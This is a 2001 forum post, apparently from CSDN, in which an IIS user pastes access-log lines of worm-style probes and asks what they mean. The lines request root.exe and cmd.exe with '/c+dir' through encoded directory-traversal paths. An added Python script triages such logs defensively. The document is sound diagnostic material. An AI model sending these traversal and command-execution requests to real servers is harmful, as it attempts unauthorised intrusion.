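★★Major discovery★★
Please take a look at the following post in [Security Technology]!
http://www.csdn.net/expert/topic/340/340295.shtm
My machine runs WIN98 + IIS.
Checking the logs, I was surprised to find the hacker scan records below, which follow a regular pattern.
The IPs below are not my local IP. Could my machine be automatically scanning other people's IPs?
I am not using any tools! Strange! Could anyone who knows please explain this and suggest a fix?
Thanks!
Major discovery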
61.11.73.45 - - [19/Sep/2001:00:03:01 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 500 0
61.11.73.45 - - [19/Sep/2001:00:03:03 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 500 0
61.11.73.45 - - [19/Sep/2001:00:03:08 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.11.73.45 - - [19/Sep/2001:00:03:13 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.11.73.45 - - [19/Sep/2001:00:03:16 +0800] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:09 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:09 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:09 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.134.35.39 - - [19/Sep/2001:00:05:09 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.134.35.39 - - [19/Sep/2001:00:05:10 +0800] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:10 +0800] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:10 +0800] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.134.35.39 - - [19/Sep/2001:00:05:10 +0800] "GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:11 +0800] "GET /scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:11 +0800] "GET /scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:11 +0800] "GET /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:11 +0800] "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:12 +0800] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:12 +0800] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:12 +0800] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:12 +0800] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
.......
Records like these show up almost every time I go online, and the IPs are different!
What on earth is running in the background?
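
An added example, not part of the original post: a short Python triage of access-log lines like those above, grouping the probes by remote client and counting how many were answered with a 2xx status. In Common Log Format the first field is the address of the client that sent the request, so each entry records an inbound request to this server; the function names and the 192.0.2.10 sample line are constructed for illustration.

```python
import re
from collections import defaultdict

# Common Log Format: client ident user [time] "METHOD target PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\S+)$')

# Sample input: six lines copied from the log in the post, plus one
# constructed benign request (192.0.2.10 is a documentation address).
SAMPLE = r'''61.11.73.45 - - [19/Sep/2001:00:03:01 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 500 0
61.11.73.45 - - [19/Sep/2001:00:03:08 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.11.73.45 - - [19/Sep/2001:00:03:16 +0800] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:09 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:11 +0800] "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:12 +0800] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
192.0.2.10 - - [19/Sep/2001:00:06:00 +0800] "GET /index.htm HTTP/1.0" 200 1043
'''

def classify(target):
    """Label a request target with the probe family it matches, or None."""
    t = target.lower()
    if "/root.exe" in t:
        return "root.exe probe"
    if "cmd.exe" in t:
        return "traversal to cmd.exe" if ".." in t else "direct cmd.exe probe"
    return None

def summarize(log_text):
    """Per remote client: probe count, probe families, probes answered 2xx."""
    report = defaultdict(lambda: {"probes": 0, "kinds": set(), "answered_2xx": 0})
    for line in log_text.splitlines():
        m = CLF.match(line.strip())
        if not m:
            continue  # not a CLF record, e.g. the "......." elision
        client, _when, _method, target, status, _size = m.groups()
        kind = classify(target)
        if kind is None:
            continue  # ordinary request, not one of the probe families
        entry = report[client]
        entry["probes"] += 1
        entry["kinds"].add(kind)
        # A 2xx status would mean the request was served rather than rejected.
        if status.startswith("2"):
            entry["answered_2xx"] += 1
    return dict(report)

if __name__ == "__main__":
    for client, e in sorted(summarize(SAMPLE).items()):
        print(client, e["probes"], sorted(e["kinds"]), "2xx:", e["answered_2xx"])
```

Every probe in the posted log was answered with 404 or 500, so the `answered_2xx` count is the field to watch when running this over a full log file.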